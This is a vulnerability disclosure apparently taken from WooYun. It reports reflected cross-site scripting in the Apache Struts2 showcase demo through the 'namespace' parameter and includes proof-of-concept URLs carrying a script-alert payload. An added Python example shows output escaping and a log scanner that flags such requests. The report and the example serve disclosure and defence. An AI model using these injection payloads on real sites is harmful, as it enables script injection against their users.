
WooYun-2013-00034

Title: Apache Struts2 showcase multiple XSS

Vendor: The Apache Software Foundation

Author: Nebula

Submitted: 2013-10-24 17:17

Published: 2013-10-24 17:17

Vulnerability type: XSS (cross-site scripting) attack

Hazard rating: low

Rank: 1

Status: unable to contact the vendor, or actively neglected by the vendor

Source: http://www.wooyun.org

Tags: N/A



Details

Disclosure time-line:

2013-10-24: Contacting and waiting for the vendor to claim, details not opened to the public
2013-10-24: Vendor has neglected the vulnerability, details opened to the public

Abstract:

XSS is still present in the struts2-showcase.war demo shipped with the latest official release, struts-2.3.15.3.

Details:

I found an update of the official demo of Struts2, so I did a test. It used to be able to filter, escape input and escape output, but why didn’t it escape this time?

Proofs of concept:

The namespace parameter of two demo URLs is reflected into the page without being escaped:

http://127.0.0.1:8080/struts2-07/config-browser/actionNames.action?namespace=<script>alert(/xss/);</script>

http://127.0.0.1:8080/struts2-07/config-browser/showConfig.action?namespace=<script>alert(/xss/);</script>&actionName=showcase

[Screenshot: 11.png]

[Screenshot: 12.png]

Solutions:

Filter the input and escape the namespace value on output, before it is written into the response.
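The following is an added illustration of that fix and of how a defender would spot the reported requests; it is not the Struts showcase code. Python stands in for the JSP/FreeMarker page: `render_vulnerable` reflects the `namespace` parameter verbatim (the behaviour reported above), `render_hardened` HTML-escapes it on output, and `suspicious_namespace_requests` scans constructed access-log lines (not real traffic) for requests whose `namespace` parameter decodes to markup. The PoC URL is the one quoted in the report.

```python
import html
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed input: the first PoC URL quoted in the report.
POC_URL = ("http://127.0.0.1:8080/struts2-07/config-browser/"
           "actionNames.action?namespace=<script>alert(/xss/);</script>")


def namespace_param(url: str) -> str:
    """Return the decoded `namespace` query parameter as the action receives it.

    The query is split on '&' only, so the ';' inside the payload is kept."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "namespace":
            return unquote_plus(value)
    return ""


def render_vulnerable(namespace: str) -> str:
    """Reflect the parameter into the page verbatim (the reported behaviour)."""
    return f"<h2>Actions in namespace {namespace}</h2>"


def render_hardened(namespace: str) -> str:
    """Same fragment with the value HTML-escaped before it reaches the response.

    quote=True also escapes quotes, so the value is safe inside attributes."""
    return f"<h2>Actions in namespace {html.escape(namespace, quote=True)}</h2>"


TAG_START = re.compile(r"<[/a-zA-Z]")


def leaks_markup(page: str, value: str) -> bool:
    """True when an untrusted value that contains a tag survives verbatim."""
    return bool(TAG_START.search(value)) and value in page


# Constructed access-log lines in Common Log Format (not real traffic); the
# second line carries the payload URL-encoded, the third one raw.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Oct/2013:17:17:01 +0800] "GET /struts2-07/config-browser/'
    'actionNames.action?namespace=%2F HTTP/1.1" 200 4120',
    '10.0.0.9 - - [24/Oct/2013:17:17:03 +0800] "GET /struts2-07/config-browser/'
    'actionNames.action?namespace=%3Cscript%3Ealert(/xss/);%3C/script%3E HTTP/1.1" 200 4188',
    '10.0.0.9 - - [24/Oct/2013:17:17:05 +0800] "GET /struts2-07/config-browser/'
    'showConfig.action?namespace=<script>alert(/xss/);</script>&actionName=showcase'
    ' HTTP/1.1" 200 5010',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_namespace_requests(lines):
    """Return (line_no, decoded_namespace) for every request whose
    `namespace` parameter decodes to something containing a tag."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = namespace_param(match.group(1))
        if TAG_START.search(value):
            hits.append((line_no, value))
    return hits


if __name__ == "__main__":
    payload = namespace_param(POC_URL)
    print("vulnerable leaks markup:", leaks_markup(render_vulnerable(payload), payload))
    print("hardened leaks markup:  ", leaks_markup(render_hardened(payload), payload))
    for line_no, value in suspicious_namespace_requests(SAMPLE_LOG):
        print(f"log line {line_no}: namespace={value!r}")
```

The escaping is done at the output boundary rather than on input, which is what keeps the page safe for any value the parameter can carry; input filtering alone would have to anticipate every encoding the log scanner above already shows being used.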

Copyright:Please repost with source Nebula@Wooyun


Response

Vendor comments:

Hazard rating: no response yet

Vulnerability Rank: 0

Date confirmed: 2013-10-24 17:17

Vendor response:

Latest status:

N/A

